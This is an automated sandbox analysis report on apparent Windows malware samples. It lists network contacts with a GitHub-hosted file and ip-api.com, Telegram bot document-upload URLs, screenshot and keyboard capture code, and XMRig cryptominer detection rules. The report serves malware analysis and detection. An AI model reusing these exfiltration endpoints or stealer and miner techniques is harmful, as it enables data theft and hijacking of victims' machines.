                                  Source: Joe Sandbox ViewIP Address: 185.199.111.133 185.199.111.133
                                  Source: Joe Sandbox ViewIP Address: 142.202.242.43 142.202.242.43
                                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                  Source: unknownDNS query: name: ip-api.com
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global trafficHTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Source: unknownDNS traffic detected: queries for: ip-api.com
                                  Source: hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
                                  Source: hacn.exe, 00000000.00000003.1645313716.0000021BE6A21000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                  Source: hacn.exe, 00000000.00000003.1645313716.0000021BE6A21000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                  Source: hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                  Source: hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                  Source: hacn.exe, 00000000.00000003.1645313716.0000021BE6A21000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                  Source: hacn.exe, 00000000.00000003.1645313716.0000021BE6A21000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                  Source: hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                  Source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                  Source: hacn.exe, 00000000.00000003.1645313716.0000021BE6A21000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                  Source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                                  Source: main.exe, 00000005.00000002.1756028190.0000024419A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                                  Source: main.exe, 00000005.00000002.1756028190.0000024419A71000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://ip-api.com/json/
                                  Source: hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                  Source: hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                  Source: hacn.exe, 00000000.00000003.1645313716.0000021BE6A21000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                  Source: hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                  Source: main.exe, 00000005.00000002.1756028190.0000024419A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: hacn.exe, 00000000.00000003.1645313716.0000021BE6A21000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                  Source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                                  Source: main.exe, 00000005.00000002.1775219173.00000244324E6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://api.telegram.org/file/bot
                                  Source: hacn.exe, 00000001.00000003.1656455258.000001E4E4505000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663171779.000001E4E44D5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663621476.000001E4E452B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1664004818.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663803211.000001E4E452B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663028720.000001E4E4527000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000002.1665270780.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663944148.000001E4E452B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654402774.000001E4E4534000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654233604.000001E4E4532000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662960755.000001E4E4523000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663139978.000001E4E44C5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662672451.000001E4E451F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                                  Source: hacn.exe, 00000001.00000002.1665413675.000001E4E5D7C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                                  Source: hacn.exe, 00000001.00000003.1662672451.000001E4E451F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                                  Source: hacn.exe, 00000001.00000003.1656455258.000001E4E4505000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663171779.000001E4E44D5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663107087.000001E4E4530000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1664004818.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663028720.000001E4E4527000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000002.1665270780.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654402774.000001E4E4534000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654233604.000001E4E4532000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662960755.000001E4E4523000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663139978.000001E4E44C5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662672451.000001E4E451F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                                  Source: hacn.exe, 00000001.00000003.1656455258.000001E4E4505000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663171779.000001E4E44D5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663107087.000001E4E4530000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1664004818.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663028720.000001E4E4527000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000002.1665270780.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654402774.000001E4E4534000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654233604.000001E4E4532000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662960755.000001E4E4523000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663139978.000001E4E44C5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662672451.000001E4E451F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                                  Source: hacn.exe, 00000001.00000002.1666681967.00007FFDFB78F000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://python.org/dev/peps/pep-0263/
                                  Source: main.exe, 00000005.00000002.1756028190.000002441A6B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                                  Source: main.exe, 00000005.00000002.1756028190.0000024419A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt
                                  Source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt-
                                  Source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://system.data.sqlite.org/
                                  Source: hacn.exe, 00000000.00000003.1644672626.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1656605563.000001E4E64DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
                                  Source: hacn.exe, 00000001.00000002.1665862675.000001E4E65E8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                                  Source: main.exeString found in binary or memory: https://www.sqlite.org/copyright.html
                                  Source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://www.sqlite.org/copyright.html2
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                                  Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49730 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49733 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49749 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49759 version: TLS 1.2

                                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                                  barindex
                                  Source: main.exe.4.dr, utils.cs.Net Code: desktopScreenshot
                                  Source: Update.exe.5.dr, utils.cs.Net Code: desktopScreenshot
                                  Source: main.exe.4.dr, utils.cs.Net Code: KeyboardLayout
                                  Source: Update.exe.5.dr, utils.cs.Net Code: KeyboardLayout

                                  System Summary

                                  barindex
                                  Source: 49.2.dialer.exe.21cc15ed520.3.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                  Source: 49.2.dialer.exe.21cc15ed520.3.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                                  Source: 49.2.dialer.exe.21cc15ed520.3.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                                  Source: 49.2.dialer.exe.21cc15ed520.3.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                  Source: 49.2.dialer.exe.21cc15ed520.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                                  Source: 49.2.dialer.exe.21cc15ed520.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                                  Source: 49.2.dialer.exe.21cc15e9c40.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                  Source: 49.2.dialer.exe.21cc15e9c40.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                                  Source: 49.2.dialer.exe.21cc15e9c40.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                                  Source: 00000031.00000002.2888080335.0000021CC15E7000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                  Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
